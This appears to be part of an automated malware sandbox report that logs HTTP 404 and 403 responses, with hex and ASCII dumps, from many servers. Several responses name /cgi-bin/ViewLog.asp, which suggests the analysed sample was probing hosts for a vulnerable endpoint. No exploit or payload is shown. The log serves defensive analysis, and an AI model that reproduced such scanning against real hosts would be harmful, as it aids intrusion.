6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 22:35:14 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Sun, 14 Apr 2024 14:28:30 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: owsdcontent-type: text/htmlcontent-length: 38Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 16:35:25 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sun, 14 Apr 2024 14:35:27 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:35:31 GMTCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=ISO-8859-1Content-Length: 1286Server: Jetty(8.1.5.v20120716)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:44:55 GMTServer: Apache/2.4.46 (Unix) OpenSSL/1.1.1hX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 14 Apr 2024 14:35:40 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 13:51:48 GMTContent-Type: text/htmlData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.</BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 14 Apr 2024 14:35:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sun, 14 Apr 2024 14:35:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 84(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!+Y2T@?0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Sun, 14 Apr 2024 14:30:36 GMTServer: ApacheData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
